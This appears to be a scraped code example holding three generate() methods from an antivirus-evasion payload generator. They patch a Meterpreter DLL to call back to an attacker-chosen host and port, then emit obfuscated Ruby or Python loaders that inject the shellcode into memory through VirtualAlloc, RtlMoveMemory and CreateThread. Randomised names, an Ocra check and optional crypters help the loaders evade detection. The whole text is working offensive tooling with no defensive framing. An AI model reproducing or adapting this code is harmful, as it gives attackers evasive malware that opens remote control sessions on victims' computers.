Exemple #1
0
    def generate(self):

        # get the main meterpreter .dll with the header/loader patched
        meterpreterDll = patch.headerPatch()

        # turn on SSL
        meterpreterDll = patch.patchTransport(meterpreterDll, True)

        # replace the URL
        urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
            self.required_options['LPORT']
            [0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
        meterpreterDll = patch.patchURL(meterpreterDll, urlString)

        # replace in the UA
        meterpreterDll = patch.patchUA(
            meterpreterDll,
            "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
        payloadCode += "exit if Object.const_defined?(:Ocra)\n"

        # randomly generate out variable names
        payloadName = helpers.randomString().lower()
        ptrName = helpers.randomString().lower()
        threadName = helpers.randomString().lower()
        Shellcode = helpers.randomString().lower()
        randInflateFuncName = helpers.randomString().lower()
        randb64stringName = helpers.randomString().lower()
        randVarName = helpers.randomString().lower()

        # deflate function
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
        payloadCode += "  " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
        payloadCode += "  zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
        payloadCode += "  buf = zstream.inflate(" + randVarName + ")\n"
        payloadCode += "  zstream.finish\n"
        payloadCode += "  zstream.close\n"
        payloadCode += "  return buf\n"
        payloadCode += "end\n\n"

        payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"

        payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
        payloadCode += "%s = %s\n" % (payloadName, Shellcode)
        payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
            ptrName, payloadName, payloadName)
        payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % (
            ptrName, payloadName, payloadName, threadName, ptrName, threadName)

        #if self.required_options["USE_CRYPTER"][0].lower() == "y":
        #    payloadCode = encryption.rubyCrypter(payloadCode)

        return payloadCode
    def generate(self):

        # get the main meterpreter .dll with the header/loader patched
        meterpreterDll = patch.headerPatch()

        # turn on SSL
        meterpreterDll = patch.patchTransport(meterpreterDll, False)

        # replace the URL
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
        meterpreterDll = patch.patchURL(meterpreterDll, urlString)

        # replace in the UA
        meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
        payloadCode += "exit if Object.const_defined?(:Ocra)\n"

        # randomly generate out variable names
        payloadName = helpers.randomString().lower()
        ptrName = helpers.randomString().lower()
        threadName = helpers.randomString().lower()
        Shellcode = helpers.randomString().lower()
        randInflateFuncName = helpers.randomString().lower()
        randb64stringName = helpers.randomString().lower()
        randVarName = helpers.randomString().lower()

        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
        payloadCode += "  " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
        payloadCode += "  zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
        payloadCode += "  buf = zstream.inflate("+ randVarName +")\n"
        payloadCode += "  zstream.finish\n"
        payloadCode += "  zstream.close\n"
        payloadCode += "  return buf\n"
        payloadCode += "end\n\n"

        payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"

        payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
        payloadCode += "%s = %s\n" %(payloadName, Shellcode)
        payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
        payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)

        if self.required_options["USE_CRYPTER"][0].lower() == "y":
            payloadCode = encryption.rubyCrypter(payloadCode)

        return payloadCode
    def generate(self):

        # get the main meterpreter .dll with the header/loader patched
        meterpreterDll = patch.headerPatch()

        # turn off SSL
        meterpreterDll = patch.patchTransport(meterpreterDll, False)

        # replace the URL
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
        meterpreterDll = patch.patchURL(meterpreterDll, urlString)
        
        # replace in the UA
        meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode